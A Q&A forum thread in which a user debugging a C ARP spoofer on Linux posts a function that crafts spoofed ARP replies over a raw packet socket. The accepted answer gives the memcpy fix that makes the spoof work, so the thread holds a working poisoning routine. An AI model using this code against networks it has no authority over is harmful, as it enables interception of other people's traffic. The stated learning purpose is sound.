target computer arp cache not updating when arp spoofing in c on linux

0
votes

I am trying to make a simple arp spoofer in c on linux (mainly to better understand low level networking). I was so far successfull with creating an arp request and getting arp replies with mac addresses of the target and the gateway, but whenever I send out arp replies to the target/gateway, the arp table on my test computer is not updating, it still shows proper gateway mac address. It is not a network problem because kali linux arpspoof command is working properly and arp cache is updating.

Here is my code for sending spoofed arp packets:

void arp_spoof(int sock, LOCAL_DATA localData, uint32_t pdst, unsigned char hwdst[6], uint32_t psrc)
{
struct ether_arp arpPacket;

struct sockaddr_ll addr = {0};
addr.sll_family = AF_PACKET;
addr.sll_ifindex = localData.interface_index;
addr.sll_halen = ETHER_ADDR_LEN;
addr.sll_protocol = htons(ETH_P_ARP);
memcpy(addr.sll_addr, &hwdst, ETHER_ADDR_LEN);  // destination physical address

// basic info about the arp packet
arpPacket.arp_hrd = htons(ARPHRD_ETHER);
arpPacket.arp_pro = htons(ETH_P_IP);
arpPacket.arp_hln = ETHER_ADDR_LEN;
arpPacket.arp_pln = sizeof(in_addr_t);
arpPacket.arp_op = htons(ARPOP_REPLY);

/*======== Resulting Structure ========

Source MAC : local mac (attacker)
Source IP  : ip of the machine attacker wants
             destination machine to believe is the source

Destination MAC : real destination physical address
Destination IP  : real destination ip address

======================================*/

// Source MAC [REAL]
memcpy(&arpPacket.arp_sha, localData.mac_address, sizeof(arpPacket.arp_sha));

// Source IP [SPOOFED / FAKE]
memcpy(&arpPacket.arp_spa, &psrc, sizeof(arpPacket.arp_spa));

// Destination MAC [REAL]
memcpy(&arpPacket.arp_tha, hwdst, sizeof(arpPacket.arp_tha));

// Destination ip [REAL]
memcpy(&arpPacket.arp_tpa, &pdst, sizeof(arpPacket.arp_tpa));

// sending the packet to the target
if (sendto(sock, &arpPacket, sizeof(arpPacket), 0, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
        printf("Error arp spoofing target: ");
        PrintIpAddress(pdst);
}
1
clinuxnetworkingarp
It could be because the real host is also replying to the ARP request, and it is arriving last, forcing the requesting host to update its ARP table with the real MAC address. There can also be something like DHCP snooping and Dynamic ARP inspection on a switch. - Ron Maupin
@RonMaupin hmm, does that mean that I should change the timing of when the packets are sent? Interestingly when I execute an arpspoof command on kali linux, it arp spoofs the target correctly and the spoofed MAC address is showing up in the target's arp table. - Flare Flax

1 Answers

0
votes

I made a stupid mistake in the code.
In the below line:
memcpy(addr.sll_addr, &hwdst, ETHER_ADDR_LEN); I was giving the pointer to the pointer as a parameter &hwdst. Since hdwst is already an array from the parameter, it would just take the pointer to the first element. Correct line should be: memcpy(addr.sll_addr, hwdst, ETHER_ADDR_LEN);